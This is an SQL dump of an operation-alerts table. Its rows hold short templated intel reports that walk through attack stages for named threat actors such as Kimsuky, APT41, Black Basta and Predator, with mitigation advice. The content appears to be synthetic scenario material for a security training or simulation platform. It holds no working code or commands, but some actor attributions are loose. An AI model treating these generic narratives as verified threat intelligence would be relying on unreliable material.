(842, 170, 1488, 2, 'Unveiling Persistence Mechanisms: Scheduled Tasks in Kimsuky\'s Arsenal', '# Unveiling Persistence Mechanisms\n\n## Context:\nAfter successfully deploying malware via malicious documents, Kimsuky ensures its presence on the victim\'s system through persistence mechanisms.\n\n## How It Works:\n- **Scheduled Tasks**: The malware creates scheduled tasks to run its components at regular intervals, ensuring it remains active even after a system reboot.\n- **Survivability**: This method allows the attackers to maintain long-term access to the compromised system without needing to reinfect it.\n\nUnderstanding and identifying scheduled tasks configured without the user\'s knowledge can indicate a compromised system.', '2026-03-15 19:07:40'),
(843, 170, 1489, 3, 'Lateral Movement Analysis: Navigating Shared Drives', '# Lateral Movement Analysis\n\n## Context:\nWith persistence established, Kimsuky actors focus on expanding their reach within the targeted network.\n\n## How It Works:\n- **Shared Drive Access**: The attackers exploit shared network drives to spread their influence, accessing sensitive files and installing malware on additional systems.\n- **Techniques**: This often involves exploiting weak passwords or leveraging stolen credentials to navigate shared resources.\n\nMonitoring access logs and unusual activity on shared drives can help identify signs of lateral movement.', '2026-03-15 19:07:40'),
(844, 170, 1490, 4, 'Data Exfiltration via Chrome Extension: The Final Act', '# Data Exfiltration via Chrome Extension\n\n## Context:\nIn the final stage of their operation, Kimsuky actors focus on exfiltrating valuable data using malicious Chrome extensions.\n\n## How It Works:\n- **Email Theft**: The malware utilizes a rogue Chrome extension to capture and exfiltrate email data directly from the victim\'s browser.\n- **Covert Operations**: This method allows the attackers to bypass traditional network defenses, as the data theft occurs directly within the browser environment.\n\nRegular audits of installed browser extensions and monitoring for unusual data transfer activities are crucial to detecting such exfiltration attempts.', '2026-03-15 19:07:40'),
(845, 170, 1491, 5, NULL, NULL, '2026-03-15 19:07:40'),
(846, 171, 1492, 1, 'Analysis of Initial Network Breach', '# Analysis of Initial Network Breach\n\n## Overview\nFollowing the detection of suspicious network activity, an in-depth analysis was conducted to determine the nature and origin of the breach.\n\n## Findings\n- **Origin IP Address**: The breach originated from an IP address previously associated with APT41 activities.\n- **Attack Vector**: The attackers utilized spear-phishing emails targeting healthcare employees, containing malicious links.\n\n## Recommendations\n- Implement additional email filtering systems to detect and quarantine suspicious emails.\n- Conduct organization-wide phishing awareness training.\n\n## Next Steps\nPrepare for potential execution of the Mivast backdoor, as this is a known tactic of APT41 post-initial access.', '2026-03-15 19:08:03'),
(847, 171, 1493, 2, 'Mivast Backdoor Execution Analysis', '# Mivast Backdoor Execution Analysis\n\n## Overview\nThe execution of the Mivast backdoor has been confirmed within the network, facilitating unauthorized access and control.\n\n## Findings\n- **Backdoor Deployment**: The Mivast backdoor was deployed using a PowerShell script executed by a compromised user account.\n- **Command and Control (C2) Server**: Communication observed with a known C2 server associated with APT41.\n\n## Recommendations\n- Isolate affected systems to prevent further spread.\n- Enhance monitoring of outbound traffic for C2 communications.\n\n## Next Steps\nFocus on identifying persistence mechanisms to ensure complete eradication of the threat.', '2026-03-15 19:08:03'),
(848, 171, 1494, 3, 'Persistence Mechanism Detection', '# Persistence Mechanism Detection\n\n## Overview\nPost execution of Mivast, persistence mechanisms were identified, ensuring prolonged access for the attackers.\n\n## Findings\n- **Scheduled Tasks**: Attackers established persistence using scheduled tasks that execute malicious scripts at regular intervals.\n- **Registry Changes**: Modifications detected in the Windows Registry, enabling backdoor re-execution on startup.\n\n## Recommendations\n- Review and clean scheduled tasks across all endpoints.\n- Restore Registry settings to defaults, ensuring no malicious entries remain.\n\n## Next Steps\nInvestigate lateral movement within the network, especially towards high-value targets like patient records.', '2026-03-15 19:08:03'),
(849, 171, 1495, 4, 'Unauthorized Access to Patient Records', '# Unauthorized Access to Patient Records\n\n## Overview\nLateral movement was detected, with unauthorized access to patient records, signaling a serious data breach.\n\n## Findings\n- **Compromised Accounts**: Multiple user accounts were exploited to gain access to sensitive health insurance information.\n- **Data Access Patterns**: Unusual data access patterns were observed, correlating with APT41\'s known behaviors.\n\n## Recommendations\n- Conduct a full audit of user account permissions and reset credentials across the network.\n- Implement stricter access controls and data encryption methods for sensitive records.\n\n## Next Steps\nPrepare for potential data exfiltration attempts and enhance monitoring for any outbound data transfers.', '2026-03-15 19:08:03'),
(850, 171, 1496, 5, NULL, NULL, '2026-03-15 19:08:03'),
(851, 172, 1497, 1, 'Analysis of Initial Access Vector', '### Suspicious Network Activity Detected\n\nFollowing the detection of suspicious network activity, preliminary investigations indicate that APT41 leveraged a supply chain vulnerability in ASUS software updates to gain initial access. The attack exploited a trojanized version of ASUS Live Update to target specific MAC addresses. This tactic allowed for precise targeting amidst a broad user base.\n\n#### Key Indicators:\n- **Targeted MAC Addresses**: Evidence suggests that the attackers pre-selected specific MAC addresses to minimize detection.\n- **Network Patterns**: Unusual traffic patterns were associated with the initial compromise, including connections to known APT41 command and control (C&C) servers.\n\n#### Next Steps:\nPrepare for potential malicious code execution as the attackers may attempt to establish a foothold within the compromised systems.', '2026-03-15 19:08:36'),
(852, 172, 1498, 2, 'Investigation into Malicious Code Execution', '### Malicious Code Execution Identified\n\nPost initial access, APT41 executed malicious code within compromised systems, deploying payloads designed to maintain access and establish control.\n\n#### Key Findings:\n- **Payload Characteristics**: Analysis of the executed code reveals the use of sophisticated obfuscation techniques to evade detection by traditional antivirus solutions.\n- **Command and Control**: The malware established persistent connections to C&C servers, enabling remote control by the threat actors.\n\n#### Insights:\nInvestigating persistence mechanisms is crucial, as APT41 has a history of using advanced techniques to maintain access over extended periods. Monitoring for registry changes and scheduled tasks is recommended.', '2026-03-15 19:08:36'),
(853, 172, 1499, 3, 'Uncovering Persistence Mechanisms', '### Persistence Mechanisms Discovered\n\nAPT41 utilized multiple persistence mechanisms to ensure continued access to the compromised systems.\n\n#### Techniques Observed:\n- **Registry Modifications**: Changes to the Windows registry were identified, allowing the malware to execute upon system startup.\n- **Scheduled Tasks**: Malicious tasks were created to run at regular intervals, ensuring the malware\'s presence and functionality.\n\n#### Strategic Implications:\nThese persistence techniques highlight APT41\'s ability to remain embedded within a network. Understanding these methods aids in detecting and neutralizing their presence, preventing further lateral movement within the network.', '2026-03-15 19:08:36'),
(854, 172, 1500, 4, 'Lateral Movement and Impending Data Exfiltration', '### Lateral Movement Detected\n\nAPT41\'s operations have progressed to lateral movement, expanding their reach within the compromised network.\n\n#### Observations:\n- **Credential Dumping**: The attackers have begun harvesting credentials, leveraging them to access additional systems and resources.\n- **Network Traffic Analysis**: Increased internal network traffic suggests exploration and mapping of the network by the threat actors.\n\n#### Implications for Data Exfiltration:\nWith lateral movement underway, the risk of targeted data exfiltration is high. Enhanced monitoring of data flows and implementing data loss prevention strategies are critical to mitigate potential data breaches.', '2026-03-15 19:08:36'),
(855, 172, 1501, 5, NULL, NULL, '2026-03-15 19:08:36'),
(856, 173, 1502, 1, 'Insight into Phishing Tactics Used by NetTraveler', '### Overview\nThe initial alert regarding a suspicious phishing email provides critical insights into the tactics employed by NetTraveler. This report delves into the specifics of how these phishing emails are crafted and the common characteristics that have been identified.\n\n### Email Content Analysis\n- **Subject Lines**: Often use urgent and official-sounding language to entice the recipient to open the email.\n- **Attachments**: Typically include weaponized documents with embedded malicious macros.\n- **Links**: Phishing emails may contain links to fake login pages resembling official government or diplomatic websites.\n\n### Recommendations\n- Implement advanced email filtering solutions to detect and quarantine suspicious emails.\n- Educate employees on identifying phishing attempts and the importance of reporting them immediately.', '2026-03-15 19:08:51'),
(857, 173, 1503, 2, 'Understanding NetTraveler\'s Remote Access Trojan (RAT)', '### Overview\nFollowing the execution of NetTraveler\'s RAT, it is essential to understand its capabilities and impact. This report outlines the functionalities of the RAT and the threat it poses to compromised systems.\n\n### RAT Capabilities\n- **Data Collection**: Capable of collecting keystrokes, screenshots, and sensitive documents.\n- **Command and Control**: Communicates with C2 servers to receive commands and exfiltrate data.\n- **System Manipulation**: Can manipulate files, install additional malware, and maintain a foothold on the system.\n\n### Mitigation Strategies\n- Deploy endpoint detection and response solutions to identify and isolate compromised hosts.\n- Regularly update antivirus signatures to detect and neutralize known variants of the RAT.', '2026-03-15 19:08:51'),
(858, 173, 1504, 3, 'Persistence Mechanisms Exploited by NetTraveler', '### Overview\nNetTraveler\'s ability to maintain persistence on infected systems is critical for prolonged espionage activities. This report explores the registry modifications used by the threat actor to ensure their malware remains active.\n\n### Registry Modification Details\n- **Registry Keys**: Commonly targeted keys include those that control startup programs and services.\n- **Techniques**: Utilize registry run keys to execute malware at system boot.\n\n### Detection and Prevention\n- Implement monitoring for unauthorized registry changes, particularly in sensitive areas such as startup keys.\n- Use Group Policy settings to restrict modifications to critical registry paths.', '2026-03-15 19:08:51'),
(859, 173, 1505, 4, 'Lateral Movement and Network Intrusion via SMB Protocol', '### Overview\nThe detection of lateral movement through the SMB protocol indicates an expansion of the threat within the network. This report analyzes the methods used by NetTraveler to move laterally and compromise additional systems.\n\n### Techniques Employed\n- **Credential Theft**: Use of stolen credentials to access shared resources.\n- **Exploitation of Vulnerabilities**: Targeting unpatched SMB vulnerabilities to propagate malware.\n\n### Defensive Measures\n- Disable SMBv1 and apply patches to mitigate known vulnerabilities.\n- Employ network segmentation to limit lateral movement and restrict access to sensitive resources.', '2026-03-15 19:08:51'),
(860, 173, 1506, 5, NULL, NULL, '2026-03-15 19:08:51'),
(861, 174, 1507, 1, 'Analysis of Spear Phishing Techniques Employed by IceFog', '## Overview\nThe initial alert was triggered by a spear phishing attempt targeting key personnel in the defense supply chain sector of Japan and South Korea. IceFog employs highly sophisticated spear phishing techniques, tailoring each email to maximize the chances of success.\n\n## Key Indicators\n- **Sender Domain Spoofing**: Emails were sent from domains closely resembling legitimate defense contractor addresses.\n- **Attachment Analysis**: Malicious attachments were disguised as official documents, often using file extensions like `.pdf` or `.docx`.\n\n## Recommendations\n- **Email Filtering**: Implement advanced email filtering systems to detect and quarantine suspicious emails.\n- **User Training**: Conduct regular training sessions for employees on recognizing phishing attempts.', '2026-03-15 19:09:15');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(862, 174, 1508, 2, 'Investigation into Malicious Payload Execution', '## Overview\nFollowing the spear phishing attempt, a malicious payload was executed on compromised systems. This payload is designed to establish a foothold within the target network.\n\n## Technical Details\n- **Payload Analysis**: The payload is a custom-built malware designed to evade traditional antivirus systems.\n- **Execution Method**: Once opened, the malicious attachment exploits vulnerabilities in outdated software to execute the payload.\n\n## Recommendations\n- **Patch Management**: Regular updates and patching of software to mitigate exploitation risks.\n- **Behavioral Monitoring**: Deploy behavioral monitoring to detect unusual activity indicative of malware execution.', '2026-03-15 19:09:15'),
(863, 174, 1509, 3, 'Persistence Mechanisms: Registry Key Modifications', '## Overview\nThe malware seeks to establish persistence on infected systems by modifying specific registry keys. This technique ensures that the malware remains active even after system reboots.\n\n## Technical Indicators\n- **Registry Changes**: Modifications were detected in critical registry paths, enabling the malware to launch at startup.\n- **Obfuscation Techniques**: The malware employs obfuscation to hide its registry changes from detection tools.\n\n## Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of registry changes to detect unauthorized modifications.\n- **Endpoint Protection**: Enhance endpoint protection to identify and block unauthorized registry key modifications.', '2026-03-15 19:09:15'),
(864, 174, 1510, 4, 'Credential Dumping and Potential Risks', '## Overview\nCredential dumping activities were detected, indicating an attempt to harvest user credentials from compromised systems. These credentials could be used for further network infiltration.\n\n## Technical Details\n- **Tools Used**: The attackers utilized well-known tools such as Mimikatz to extract stored credentials.\n- **Targeted Accounts**: High-value accounts with elevated privileges were specifically targeted.\n\n## Recommendations\n- **Credential Storage**: Implement secure storage practices for credentials, including the use of password managers and encryption.\n- **Access Controls**: Enforce strict access controls and monitor login attempts for suspicious activities.', '2026-03-15 19:09:15'),
(865, 174, 1511, 5, NULL, NULL, '2026-03-15 19:09:15'),
(866, 175, 1512, 1, 'Initial Access: Entry Point Analysis', '### Overview\nAfter detecting suspicious network activity, further investigation into the entry point revealed the use of a sophisticated phishing attack. The attackers crafted emails mimicking trusted internal communications, which included links to malicious sites hosting exploit kits.\n\n### Key Findings\n- **Phishing Techniques**: The attackers utilized spear-phishing emails targeting key personnel.\n- **Exploit Kits**: Analysis indicates use of a known exploit kit, leveraging a zero-day vulnerability in an outdated software version.\n\n### Recommendations\n- **Immediate Actions**: Isolate affected systems to prevent further exploitation.\n- **Patch Management**: Ensure all systems are updated to mitigate known vulnerabilities.', '2026-03-15 19:09:29'),
(867, 175, 1513, 2, 'Malicious Payload Deployed: Execution Analysis', '### Overview\nFollowing the initial access, the attackers deployed a malicious payload designed to execute remote commands and begin data collection.\n\n### Key Findings\n- **Payload Characteristics**: The payload was a custom-developed malware, showing advanced obfuscation techniques to avoid detection.\n- **Command and Control (C2) Channels**: The malware established encrypted connections to remote servers, indicating the setup of a C2 infrastructure.\n\n### Recommendations\n- **Monitoring**: Enhance network monitoring to identify unusual outbound traffic.\n- **Endpoint Protection**: Deploy enhanced endpoint detection and response solutions to prevent execution of similar payloads.', '2026-03-15 19:09:29'),
(868, 175, 1514, 3, 'Establishing Persistence: Backdoor Discovery', '### Overview\nThe attackers have successfully established persistent access within the network. Multiple backdoors were identified, allowing for continued access even after system reboots.\n\n### Key Findings\n- **Persistence Mechanisms**: Utilization of registry modifications and service creation to maintain access.\n- **Backdoor Variants**: Discovery of multiple variants, indicating a layered approach to persistence.\n\n### Recommendations\n- **System Hardening**: Review and harden system configurations to eliminate persistence mechanisms.\n- **Regular Audits**: Conduct regular audits of critical systems to detect anomalies.', '2026-03-15 19:09:29'),
(869, 175, 1515, 4, 'Lateral Movement: Identifying Intruder Pathways', '### Overview\nThe attackers have begun lateral movement across the network, targeting high-value systems and data repositories.\n\n### Key Findings\n- **Techniques Used**: Utilization of legitimate tools and stolen credentials to blend in with normal network traffic.\n- **Targeted Systems**: Critical databases and file servers have been accessed, suggesting a focus on data exfiltration.\n\n### Recommendations\n- **Access Control**: Review and restrict user privileges to limit lateral movement capabilities.\n- **Network Segmentation**: Implement network segmentation to contain the spread of an attack.', '2026-03-15 19:09:29'),
(870, 175, 1516, 5, NULL, NULL, '2026-03-15 19:09:29'),
(871, 177, 1517, 1, 'Analysis of Phishing Tactics Used', '### Overview\nThe initial alert, *Suspicious Email Attachment Detected*, suggests a targeted phishing attempt designed to deliver the Cytrox Predator Spyware. Upon investigation, the phishing email was found to contain a malicious attachment disguised as a legitimate document.\n\n### Details\n- **Subject Line**: \"Urgent Policy Update Required\"\n- **Attachment Name**: \"PolicyUpdate.docx\"\n- **Sender Profile**: The sender mimicked a known government official\'s email address.\n\n### Threat Actor Tactics\nThe attacker used social engineering techniques to build trust, leveraging current political events to craft a compelling narrative. This suggests a well-researched operation targeting opposition politicians.\n\n### Recommendations\n- **Training**: Conduct phishing awareness training for potential targets.\n- **Filtering**: Strengthen email filtering systems to detect suspicious attachments.', '2026-03-15 19:10:11'),
(872, 177, 1518, 2, 'Zero-click Exploit Analysis', '### Overview\nFollowing the initial phishing attempt, a *Zero-click Exploit Triggered* alert indicates that the spyware executed a remote code execution without user interaction. This sophisticated attack vector suggests advanced capabilities of the threat actor.\n\n### Exploit Details\n- **Vulnerability**: Leveraged a previously unknown zero-day in messaging apps.\n- **Target Device**: Latest iOS version, indicating a high level of sophistication.\n\n### Implications\nThe zero-click exploit allows for full device compromise, enabling the attacker to bypass traditional security measures and gain persistent access.\n\n### Recommendations\n- **Patch Management**: Collaborate with vendors to accelerate patch release.\n- **Monitoring**: Enhance anomaly detection on devices to identify unusual behavior.', '2026-03-15 19:10:11'),
(873, 177, 1519, 3, 'Persistence Mechanism Identified', '### Overview\nUpon execution, the Cytrox Predator Spyware has established persistence on the compromised device, as indicated by the *Spyware Establishes Persistence* alert. Understanding this mechanism is crucial for effective remediation.\n\n### Persistence Techniques\n- **Fileless Persistence**: Utilizes system processes to avoid detection.\n- **Scheduled Tasks**: Implements tasks to reinstate itself after removal attempts.\n\n### Impact\nThis persistence allows the spyware to maintain its foothold, continually exfiltrating sensitive information and conducting surveillance.\n\n### Recommendations\n- **Forensic Analysis**: Perform comprehensive device forensic analysis to detect and remove persistent components.\n- **Security Protocols**: Update security protocols to prevent re-establishment of persistence.', '2026-03-15 19:10:11'),
(874, 177, 1520, 4, NULL, NULL, '2026-03-15 19:10:11'),
(875, 176, 1521, 1, 'Analysis of Phishing Techniques', '### Overview\nThe suspicious phishing email detected employs advanced social engineering techniques, masquerading as a legitimate communication from a trusted source.\n\n### Tactics\n- **Spoofed Email Address**: The sender\'s address closely resembles that of a known vendor.\n- **Urgent Call to Action**: The email subject line includes an urgent request for immediate action.\n- **Malicious Attachment**: Contains an attachment designed to exploit vulnerabilities in email client applications.\n\n### Recommendations\n- Implement filters to detect and block similar phishing attempts.\n- Educate employees on recognizing phishing emails.', '2026-03-15 19:10:20'),
(876, 176, 1522, 2, 'Mobile Device Malware Execution', '### Overview\nFollowing the phishing email, the malware was successfully executed on the target\'s mobile device.\n\n### Infection Vector\n- **Payload Delivery**: Delivered via an attachment that exploited a known security vulnerability in the mobile OS.\n- **Execution**: Triggers upon opening the attachment, bypassing standard security checks.\n\n### Mitigation Steps\n- Update mobile device software to patch known vulnerabilities.\n- Use mobile threat defense solutions to detect and block malware execution.', '2026-03-15 19:10:20'),
(877, 176, 1523, 3, 'Persistence Mechanisms on Mobile Devices', '### Overview\nThe malware establishes persistence on the infected mobile device, allowing for ongoing surveillance and data collection.\n\n### Persistence Techniques\n- **Rootkit Deployment**: Installs root-level access to survive reboots and updates.\n- **Background Service**: Runs as a background process, avoiding detection.\n\n### Recommendations\n- Conduct regular device audits to detect unauthorized applications.\n- Use endpoint security solutions to monitor and prevent persistence mechanisms.', '2026-03-15 19:10:20'),
(878, 176, 1524, 4, 'Credential Harvesting Tactics', '### Overview\nCredential harvesting was detected, indicating the malware\'s intent to capture sensitive login information.\n\n### Techniques Used\n- **Keylogging**: Records keystrokes to capture usernames and passwords.\n- **Phishing Pages**: Redirects users to fake login pages mimicking legitimate sites.\n\n### Countermeasures\n- Implement multi-factor authentication to reduce the impact of credential theft.\n- Use anti-phishing tools to detect and block fake login pages.', '2026-03-15 19:10:20'),
(879, 176, 1525, 5, 'Lateral Movement Attempts', '### Overview\nThe malware attempts lateral movement to infiltrate the corporate network from the compromised mobile device.\n\n### Movement Techniques\n- **Credential Reuse**: Utilizes stolen credentials to access network resources.\n- **Network Scanning**: Scans for vulnerable devices and services within the network.\n\n### Mitigation Strategies\n- Restrict network access for mobile devices based on security policies.\n- Monitor network traffic for signs of unauthorized access attempts.', '2026-03-15 19:10:20'),
(880, 176, 1526, 6, 'Data Exfiltration and Human Rights Implications', '### Overview\nData exfiltration has been initiated, with significant implications for privacy and human rights.\n\n### Data Exfiltration Methods\n- **Encrypted Channels**: Uses encrypted connections to transmit data to external servers.\n- **Stealth Techniques**: Minimizes bandwidth usage to avoid detection.\n\n### Human Rights Impact\n- **Surveillance Concerns**: Potential misuse of personal data for unauthorized surveillance.\n- **Privacy Violations**: Breaches of privacy may lead to human rights violations.\n\n### Recommendations\n- Implement data loss prevention solutions to monitor and block unauthorized data transfers.\n- Conduct impact assessments to understand and mitigate human rights risks.', '2026-03-15 19:10:20'),
(881, 176, 1527, 7, NULL, NULL, '2026-03-15 19:10:20'),
(882, 178, 1528, 1, 'Analysis of Malicious Payload Execution', '## Overview\nFollowing the initial detection of suspicious browser exploits, our team has confirmed the execution of a malicious payload. This payload is designed to exploit vulnerabilities within Windows browsers, specifically targeting those used by activists and journalists.\n\n## Technical Details\n- **Payload Type**: The payload is identified as a binary executable that initializes upon browser exploit.\n- **Execution Mechanism**: Utilizes PowerShell scripts to execute further code.\n- **Targets**: Primarily Windows-based systems running outdated browser versions.\n\n## Impact\nThe execution phase indicates a transition from mere exploitation to active threat engagement, potentially allowing for unauthorized access and manipulation of the target system.\n\n## Next Steps\nMonitoring for the establishment of command and control infrastructure is critical to understanding the spyware\'s full operational capabilities.', '2026-03-15 19:10:36'),
(883, 178, 1529, 2, 'Command and Control Infrastructure Established', '## Overview\nPost-execution of the malicious payload, our analysis reveals the establishment of a Command and Control (C2) infrastructure. This represents a significant escalation in the spyware\'s operation, allowing attackers to maintain persistent access.\n\n## Technical Details\n- **C2 Protocols**: Communication over HTTPS with encrypted traffic.\n- **Persistence Mechanisms**: Registry modifications and scheduled tasks ensure the malware remains active.\n- **C2 Servers**: Geographically dispersed, utilizing both legitimate cloud services and compromised servers.\n\n## Implications\nThis development allows attackers to remotely execute commands, deploy additional payloads, and potentially manipulate or exfiltrate data from the target systems.\n\n## Recommendations\nImmediate remediation efforts should focus on disrupting C2 communications and mitigating further data exfiltration risks.', '2026-03-15 19:10:36'),
(884, 178, 1530, 3, 'Data Exfiltration Patterns Identified', '## Overview\nFollowing the establishment of Command and Control channels, data exfiltration activities have been detected. This marks a critical phase where sensitive information is being extracted from compromised systems.\n\n## Technical Details\n- **Data Types**: Documents, emails, contact lists, and browsing histories.\n- **Exfiltration Channels**: Encrypted uploads to remote servers disguised as normal traffic.\n- **Timing**: Exfiltration occurs during low activity periods to avoid detection.\n\n## Impact\nThe exfiltration of data poses severe risks to the privacy and security of targeted individuals, with potential ramifications for their safety.\n\n## Countermeasures\nEnhanced monitoring and network traffic analysis are essential to identify and block exfiltration attempts. Collaboration with ISPs and cloud service providers may aid in tracing and neutralizing the threat actors\' infrastructure.', '2026-03-15 19:10:36'),
(885, 178, 1531, 4, NULL, NULL, '2026-03-15 19:10:36'),
(886, 179, 1532, 1, 'Analysis of Zero-Click iCloud Calendar Exploit', '# Analysis of Zero-Click iCloud Calendar Exploit\n\n## Context\nAfter identifying the initial access method utilized in the Quadream REIGN spyware operation, further analysis reveals the sophistication of the zero-click iCloud calendar exploit.\n\n## Technical Details\n- **Exploit Vector**: The exploit leverages a zero-click mechanism within the iCloud calendar invites, allowing malicious payloads to be executed without user interaction.\n- **Affected Platforms**: Primarily targets iOS devices running versions susceptible to this exploit.\n\n## Next Steps\nThe next phase of investigation will focus on the execution of the REIGN spyware on compromised iOS devices, assessing the impact and identifying any protective measures that can be implemented.', '2026-03-15 19:11:07'),
(887, 179, 1533, 2, 'Deep Dive into REIGN Spyware Execution on iOS', '# Deep Dive into REIGN Spyware Execution on iOS\n\n## Context\nFollowing the delivery of the payload via the zero-click exploit, the REIGN spyware initiates execution on targeted iOS devices.\n\n## Technical Details\n- **Execution Mechanism**: Utilizes system vulnerabilities to gain initial execution permissions.\n- **Capabilities**: Once executed, REIGN can intercept communications, access files, and monitor user activities.\n\n## Next Steps\nThe focus will now shift to understanding how the spyware maintains persistence on infected devices, ensuring long-term access and data collection.', '2026-03-15 19:11:07'),
(888, 179, 1534, 3, 'Establishing Persistence on iOS Devices', '# Establishing Persistence on iOS Devices\n\n## Context\nThe persistence mechanism of the REIGN spyware ensures continuous access to the infected iOS devices, even after reboots or updates.\n\n## Technical Details\n- **Persistence Techniques**: The spyware modifies system files and utilizes root access to prevent detection and removal.\n- **Challenges**: Detection is complicated due to its integration with legitimate iOS processes.\n\n## Next Steps\nWe will investigate how the spyware utilizes credentials to perform lateral movement to associated iCloud services, expanding its reach and data collection capabilities.', '2026-03-15 19:11:07'),
(889, 179, 1535, 4, 'Lateral Movement to Connected iCloud Services', '# Lateral Movement to Connected iCloud Services\n\n## Context\nAfter establishing persistence, REIGN spyware aims to leverage credentials to access connected iCloud services, enhancing its data exfiltration capabilities.\n\n## Technical Details\n- **Credential Harvesting**: Utilizes captured credentials to authenticate and access additional services.\n- **Services Targeted**: Includes iCloud Drive, Photos, and Contacts, providing extensive surveillance opportunities.\n\n## Next Steps\nThe final analysis will focus on the methods used for exfiltration of sensitive data to external servers, assessing the scope of data breaches and potential mitigations.', '2026-03-15 19:11:07'),
(890, 179, 1536, 5, NULL, NULL, '2026-03-15 19:11:07'),
(891, 180, 1537, 1, 'Analyzing the Phishing Attack Vector', '## Overview\nThe initial phase of Black Basta\'s operation involved a phishing email containing a malicious attachment. This email was crafted to appear as a legitimate business communication, increasing the likelihood of user interaction.\n\n## Key Indicators\n- **Sender Domain**: The email originated from a domain resembling a known supplier.\n- **Attachment Type**: Executable file masquerading as a PDF.\n\n## Next Steps\nGiven this initial breach, the next phase typically involves the deployment of malware. Monitoring network traffic for unusual patterns is essential to identify the execution of QBot malware.', '2026-03-15 19:11:40'),
(892, 180, 1538, 2, 'QBot Malware Execution and Its Implications', '## Overview\nFollowing the successful phishing attack, QBot malware has been executed. QBot is known for its use in banking fraud but is also utilized to create a foothold in systems for ransomware deployment.\n\n## Key Indicators\n- **Process Activity**: Unusual process creation linked to QBot binaries.\n- **Network Activity**: Communication with command and control servers.\n\n## Next Steps\nWith QBot active, the focus shifts to establishing persistence. This often involves manipulating system registries or scheduled tasks to ensure malware survives reboots.', '2026-03-15 19:11:40'),
(893, 180, 1539, 3, 'Persistence Mechanisms: Registry Modifications', '## Overview\nTo maintain a foothold within the compromised network, Black Basta employs registry modifications as a persistence mechanism. This ensures that malware can survive system reboots and remain active.\n\n## Key Indicators\n- **Registry Changes**: Entries created or modified in `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\n- **Scheduled Tasks**: New tasks that trigger the execution of QBot.\n\n## Next Steps\nWith persistence established, lateral movement becomes the next objective for threat actors. Monitoring inter-system communication and user account activities is critical to detect and prevent lateral movement.', '2026-03-15 19:11:40'),
(894, 180, 1540, 4, 'Detecting and Mitigating Lateral Movement', '## Overview\nLateral movement is a crucial phase wherein attackers attempt to move through the network to identify and access critical assets. Black Basta leverages tools and native OS features to navigate laterally.\n\n## Key Indicators\n- **Unusual Logins**: Multiple login attempts across various systems.\n- **Network Traffic**: Increase in SMB protocol usage.\n\n## Next Steps\nAs lateral movement has been detected, attention must now turn to preventing data exfiltration. Implement data loss prevention (DLP) measures and closely monitor outbound traffic for signs of data being sent to unauthorized destinations.', '2026-03-15 19:11:40'),
(895, 180, 1541, 5, NULL, NULL, '2026-03-15 19:11:40'),
(896, 181, 1542, 1, 'Investigative Report: Malicious Macro Execution', '# Investigative Report: Malicious Macro Execution\n\n## Overview\nFollowing the detection of a suspicious phishing email, further investigation has revealed the execution of a malicious macro embedded within an attached document. This execution phase is critical as it lays the groundwork for further infiltration into the system.\n\n## Technical Details\n- **Document Type**: Microsoft Word\n- **Macro Language**: VBA Script\n- **Observed Behavior**: Upon opening the document, the macro initiates a script that downloads a secondary payload from a remote server.\n\n## Recommendations\n- Immediate disabling of macros across the organization unless explicitly required.\n- Conduct a thorough review of email security protocols to prevent future incidents.', '2026-03-15 19:12:00'),
(897, 181, 1543, 2, 'Report on Persistence Mechanisms', '# Report on Persistence Mechanisms\n\n## Overview\nThe operation has progressed to the persistence phase, where Royal APT is attempting to maintain a foothold within the compromised infrastructure.\n\n## Observed Techniques\n- **Registry Modification**: Changes made to the Windows Registry to ensure payload execution at boot.\n- **Scheduled Tasks**: Creation of scheduled tasks to execute malicious scripts at regular intervals.\n\n## Implications\nThese mechanisms suggest a strategic attempt to ensure the ongoing presence and resilience of the threat actor within the network.\n\n## Countermeasures\n- Regularly audit registry changes and scheduled tasks.\n- Implement endpoint detection and response (EDR) solutions to identify anomalies.', '2026-03-15 19:12:00'),
(898, 181, 1544, 3, 'Internal Network Reconnaissance Analysis', '# Internal Network Reconnaissance Analysis\n\n## Overview\nRoyal APT has initiated internal network reconnaissance, a critical step for lateral movement within the network.\n\n## Techniques Identified\n- **Network Scanning**: Utilization of tools like Nmap to map out network topology.\n- **Credential Dumping**: Attempts to extract stored credentials using tools like Mimikatz.\n\n## Potential Risks\n- Identification of key systems and data repositories for further exploitation.\n- Compromise of additional user accounts to facilitate lateral movement.\n\n## Mitigation Strategies\n- Monitor network traffic for unusual scanning behavior.\n- Enforce strong password policies and multi-factor authentication (MFA).', '2026-03-15 19:12:00'),
(899, 181, 1545, 4, 'Data Exfiltration Alert: Incident Report', '# Data Exfiltration Alert: Incident Report\n\n## Overview\nThe operation has reached a critical stage with detected data exfiltration activities by Royal APT.\n\n## Methodology\n- **Exfiltration Channels**: Use of encrypted channels to bypass traditional detection mechanisms.\n- **Data Types Targeted**: Sensitive business and personal data, including intellectual property.\n\n## Impact Assessment\nThe data exfiltration poses significant risks to organizational security and confidentiality, potentially leading to financial and reputational damage.\n\n## Response Actions\n- Initiate immediate incident response protocols to contain and remediate the breach.\n- Engage with cybersecurity experts to perform a detailed forensic analysis and prevent future incidents.', '2026-03-15 19:12:00'),
(900, 181, 1546, 5, NULL, NULL, '2026-03-15 19:12:00'),
(901, 182, 1547, 1, 'Analysis of Exchange Server Compromise', '### Overview\nFollowing the detection of suspicious access to the Exchange Server, a detailed analysis was conducted. Initial indicators suggest exploitation of known vulnerabilities in Exchange Server versions recently patched by Microsoft.\n\n### Technical Details\n- **CVE**: Possible exploitation of CVE-2021-26855, known as ProxyLogon.\n- **Attack Vector**: Unauthorized access was achieved through a compromised email account.\n\n### Recommendations\n- Immediate application of the latest security patches.\n- Review and harden email account credentials.\n- Monitor network for further unauthorized access attempts.\n\n### Next Steps\nPrepare for potential execution of malicious scripts as attackers often deploy payloads shortly after initial access.', '2026-03-15 19:12:22'),
(902, 182, 1548, 2, 'Detection of Malicious Script Execution', '### Overview\nPost detection of initial access, a malicious PowerShell script was executed on the compromised server. This script is designed to establish further foothold and facilitate persistence.\n\n### Script Capabilities\n- **Functionality**: Downloads additional payloads, creates backdoors.\n- **Indicators of Compromise (IoCs)**: Presence of encoded PowerShell commands in logs.\n\n### Recommendations\n- Immediate isolation of affected systems.\n- Conduct memory forensics to identify and remove malicious scripts.\n\n### Next Steps\nBe vigilant for persistence mechanisms that may have been installed to enable repeated access to the network.', '2026-03-15 19:12:22'),
